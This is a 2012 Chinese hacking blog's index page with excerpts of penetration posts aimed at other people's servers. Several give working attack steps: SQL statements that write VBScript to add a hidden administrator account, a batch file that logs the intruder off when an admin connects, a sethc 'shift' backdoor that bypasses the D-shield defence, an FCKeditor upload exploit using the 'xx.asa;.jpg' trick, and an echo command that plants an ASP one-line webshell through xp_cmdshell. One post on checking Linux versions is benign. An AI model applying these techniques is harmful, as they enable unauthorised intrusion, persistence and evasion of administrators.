上一页 1 ··· 8 9 10 11 12 13 14 15 16 ··· 30 下一页

2012年9月13日

后台单独生成php页面拿shell

摘要: <div id=”con660″> <div> <h4>业务领域</h4> <span>标题</span><br> <br> <span>标题2</span><br> <div>内容</div> <div>内容</div> <div>内容</div> <div>内容</div><br> </div> <div></div> 阅读全文

posted @ 2012-09-13 22:37 =_=! 阅读(238) 评论(0) 推荐(0) 编辑

2012年9月8日

删出安全狗密码

该文被密码保护。 阅读全文

posted @ 2012-09-08 20:22 =_=! 阅读(2) 评论(0) 推荐(0) 编辑

不支持PHP情况下,3306端口远程连接mysql提权

摘要: 思路:写入启动项目揽权有root密码了,Navicat连接上去执行sql语句createtablea(cmdtext);insertintoavalues(“setwshshell=createobject(“”wscript.shell”")”);insertintoavalues(“a=wshshell.run(“”cmd.exe/cnetuser11/add”",0)”);insertintoavalues(“b=wshshell.run(“”cmd.exe/cnetlocalgroupAdministrators1/add”",0)”);select*fr 阅读全文

posted @ 2012-09-08 05:20 =_=! 阅读(436) 评论(0) 推荐(0) 编辑

检测管理员上线注销自已的登陆用户

摘要: 当你在渗透中挂机嗅探的时候,如果管理员上来发现就不好了所以有了这个bat 的用处 检测管理员上线注销自已的 bat copy 保存为 xx.bat@echo off:checkchoice /C YN /T 10 /D Yquser | find "#16" && del xx.bat | logoffgoto check 说明一下 #16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1 用户名 会话名 ID 状态 空闲时间 登录时间 administrator rdp-tcp#22 2 运行中 . 2 阅读全文

posted @ 2012-09-08 02:00 =_=! 阅读(215) 评论(0) 推荐(0) 编辑

2012年8月31日

突破D盾安置shift后门 Breakthrough D – shield placement shift back door

摘要: D盾有个禁止sethc,防黑客3389后门的功能,大概研究了下,归根结底还是权限的问题,大家在放shift后门的时候删除admin~所有权限,只保留sys~读取运行权限。 这样D盾对sethc没权限了,直接失效。!下个版本修复,改成在组策略禁止运行指定程序。 gpedit.msc 用户配置—管理模板—系统—双击“不要运行指定的windows应用程序” 把sethc.exe添加进去就行了! 阅读全文

posted @ 2012-08-31 04:04 =_=! 阅读(216) 评论(0) 推荐(0) 编辑

2012年8月30日

Linux 查看系统版本

摘要: 如何得知自己正在使用的linux是什么版本呢?1. 查看内核版本命令:1) cat /proc/version2) uname -a3) uname -r2. 查看linux版本:1) lsb_release -a ,即可列出所有版本信息,找不到该命令,可以yum install redhat-lsb 注:这个命令适用于所有的linux,包括Redhat、SuSE、Debian等发行版。2) cat /etc/issue3) cat /etc/redhat-release4) rpm -q redhat-release3.查看服务器位数# archx86_64 //说明:x86_64: 是6. 阅读全文

posted @ 2012-08-30 03:19 =_=! 阅读(208) 评论(0) 推荐(0) 编辑

2012年8月29日

fckeditor 2.6X 0day

摘要: 我讲一下。这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。也比较老了http://xxxx.com/fckeditor/editor/filemanager/connectors/test.htmlhttp://xxxx.com/fckeditor/editor/filemanager/connectors/uploadtest.html 这个两个页面,是死的关键。上传xx.asa;.jpg上传之后,路径自然出来了。马为xx.asa; 注意,后面有个;除了2.63.Fckeditor 基本上每个版本都可以这么利用。上传不严格。。也可以说是IIS G6.0的漏洞觉得经 阅读全文

posted @ 2012-08-29 21:23 =_=! 阅读(378) 评论(0) 推荐(0) 编辑

2012年8月14日

echo shell

摘要: 在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。命令格式:Echo 语句 >目标站绝对目录例如:echo ^<^%execute request("cmd")%^> >D:\wwww\sb.asp这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。1.注入点后执行master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^(&q 阅读全文

posted @ 2012-08-14 16:16 =_=! 阅读(291) 评论(0) 推荐(0) 编辑

Sqlmap命令全解

摘要: -D直接直接连接到数据库 -U网址 - URL = URL目标URL -L使用burp,WebScarab代理日志解析目标保存在指定的文本文件 -M BULKFILE扫描多个目标入伍 -R REQUESTFILE负载的HTTP请求从一个文件 -G读取谷歌url,传说中的批量检测 -C从配置INI文件configfile中加载选项 要求: 这些选项可以用来指定如何连接到目标URL。 --data=DATA通过POST发送数据串 --cookie=COOKIE 的HTTP Cookie头 --cookie-urlencode U... 阅读全文

posted @ 2012-08-14 15:15 =_=! 阅读(390) 评论(0) 推荐(0) 编辑

汇成装潢行业企业网站系统vII2.1注入漏洞利用

摘要: 产品介绍: 拥有企业网站常用的模块功能:企业简介模块、联系我们模块、新闻(文章)模块、产品 模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、 栏目管理、网站碎片、管理员与权限管理等等,所有模块的分类均支持无限级别的分类 ,可拓展性非常强大。其中包括万能的栏目管理系统、网站碎片管理系统,通过这些系 统,可以组合出各种不同的页面和应用。系统带强大灵活的后台管理功能、支持伪静态 URL页面功能、自定义Banner、LOGO功能等可为企业打造出大气漂亮且具有营销力的公 司网站。漏洞文件:shownews.asp使用穿山甲cookie注入工具 爆破管理用户名工具下载地址htt 阅读全文

posted @ 2012-08-14 03:17 =_=! 阅读(175) 评论(0) 推荐(0) 编辑

上一页 1 ··· 8 9 10 11 12 13 14 15 16 ··· 30 下一页

导航